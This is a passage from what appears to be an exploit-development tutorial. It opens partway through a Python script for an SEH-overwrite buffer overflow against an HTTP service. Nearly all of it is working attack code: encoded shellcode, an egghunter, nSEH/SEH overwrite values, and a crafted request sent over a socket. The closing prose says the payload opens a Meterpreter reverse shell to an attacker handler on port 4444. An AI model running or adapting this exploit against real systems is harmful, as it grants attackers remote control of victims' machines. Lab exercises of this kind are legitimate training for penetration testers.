shellcode += "\x61\x78\x4f\x54\x4d\x76\x61\x7a\x67\x54\x78\x79\x70"
shellcode += "\x54\x35\x48\x76\x46\x63\x73\x4d\x38\x78\x45\x6b\x33"
shellcode += "\x4d\x47\x54\x33\x45\x4d\x34\x31\x48\x6c\x4b\x61\x48"
shellcode += "\x35\x74\x46\x61\x68\x53\x42\x46\x4e\x6b\x74\x4c\x32"
shellcode += "\x6b\x4e\x6b\x71\x48\x77\x6c\x56\x61\x59\x43\x4c\x4b"
shellcode += "\x47\x74\x6e\x6b\x77\x71\x6e\x30\x4c\x49\x33\x74\x66"
shellcode += "\x44\x57\x54\x31\x4b\x33\x6b\x51\x71\x43\x69\x32\x7a"
shellcode += "\x42\x71\x49\x6f\x59\x70\x51\x4f\x53\x6f\x70\x5a\x4c"
shellcode += "\x4b\x34\x52\x4a\x4b\x6e\x6d\x43\x6d\x72\x48\x77\x43"
shellcode += "\x50\x32\x63\x30\x65\x50\x62\x48\x71\x67\x71\x63\x36"
shellcode += "\x52\x31\x4f\x62\x74\x33\x58\x62\x6c\x61\x67\x51\x36"
shellcode += "\x46\x67\x6b\x4f\x4a\x75\x4e\x58\x6a\x30\x43\x31\x47"
shellcode += "\x70\x37\x70\x45\x79\x78\x44\x36\x34\x70\x50\x50\x68"
shellcode += "\x45\x79\x6b\x30\x52\x4b\x75\x50\x49\x6f\x6e\x35\x50"
shellcode += "\x6a\x46\x6a\x71\x78\x66\x6a\x57\x7a\x35\x34\x52\x47"
shellcode += "\x31\x78\x47\x72\x35\x50\x37\x61\x33\x6c\x4e\x69\x68"
shellcode += "\x66\x30\x50\x36\x30\x32\x70\x56\x30\x71\x50\x42\x70"
shellcode += "\x37\x30\x30\x50\x72\x48\x58\x6a\x66\x6f\x79\x4f\x59"
shellcode += "\x70\x59\x6f\x38\x55\x6d\x47\x42\x4a\x54\x50\x71\x46"
shellcode += "\x72\x77\x33\x58\x7a\x39\x39\x35\x30\x74\x43\x51\x4b"
shellcode += "\x4f\x69\x45\x6e\x65\x39\x50\x54\x34\x47\x7a\x49\x6f"
shellcode += "\x50\x4e\x34\x48\x62\x55\x48\x6c\x59\x78\x61\x71\x73"
shellcode += "\x30\x35\x50\x67\x70\x51\x7a\x75\x50\x71\x7a\x44\x44"
shellcode += "\x63\x66\x42\x77\x70\x68\x73\x32\x78\x59\x59\x58\x63"
shellcode += "\x6f\x39\x6f\x59\x45\x4f\x73\x6b\x48\x55\x50\x63\x4e"
shellcode += "\x74\x76\x6c\x4b\x70\x36\x32\x4a\x67\x30\x30\x68\x75"
shellcode += "\x50\x34\x50\x65\x50\x37\x70\x61\x46\x42\x4a\x77\x70"
shellcode += "\x70\x68\x32\x78\x6e\x44\x71\x43\x69\x75\x4b\x4f\x59"
shellcode += "\x45\x7a\x33\x30\x53\x51\x7a\x53\x30\x50\x56\x33\x63"
shellcode += "\x61\x47\x30\x68\x56\x62\x49\x49\x7a\x68\x43\x6f\x49"
shellcode += "\x6f\x59\x45\x4c\x43\x58\x78\x35\x50\x63\x4d\x37\x52"
shellcode += "\x33\x68\x55\x38\x65\x50\x77\x30\x43\x30\x45\x50\x31"
shellcode += "\x7a\x57\x70\x76\x30\x73\x58\x64\x4b\x76\x4f\x74\x4f"
shellcode += "\x54\x70\x39\x6f\x4a\x75\x33\x67\x63\x58\x53\x45\x62"
shellcode += "\x4e\x72\x6d\x65\x31\x6b\x4f\x6b\x65\x61\x4e\x53\x6e"
shellcode += "\x49\x6f\x46\x6c\x64\x64\x39\x79\x31\x61\x4b\x4f\x79"
shellcode += "\x6f\x59\x6f\x67\x71\x48\x43\x46\x49\x6a\x66\x63\x45"
shellcode += "\x49\x57\x48\x43\x4d\x6b\x59\x6e\x66\x6e\x36\x52\x78"
shellcode += "\x6a\x52\x4a\x55\x50\x42\x73\x59\x6f\x4e\x35\x70\x6a"
shellcode += "\x35\x50\x5a\x63\x41\x41"
#egghunter code is 32bytes
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
jmp = "\xeb\xde\x90\x90"         #nSEH - jmp short -34: back over the 2-byte jmp and the 32-byte egghunter
retn = "\xb4\x10\xac\x6a"        #SEH - 0x6aac10b4 from !mona seh, written little-endian

req = "GET / HTTP/1.1\r\n"
req += "Host: 10.10.100.133\r\n"
req += "Connection:" + junk + egg + shellcode + egghunter + jmp + retn + "\r\n"
req += "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(req)
s.close()

 

With a Metasploit multi/handler listening for windows/meterpreter/reverse_tcp on 10.10.100.103:4444, we run the script.  And we have a shell!

[Screenshot: Meterpreter session received on the attacker's handler]

 
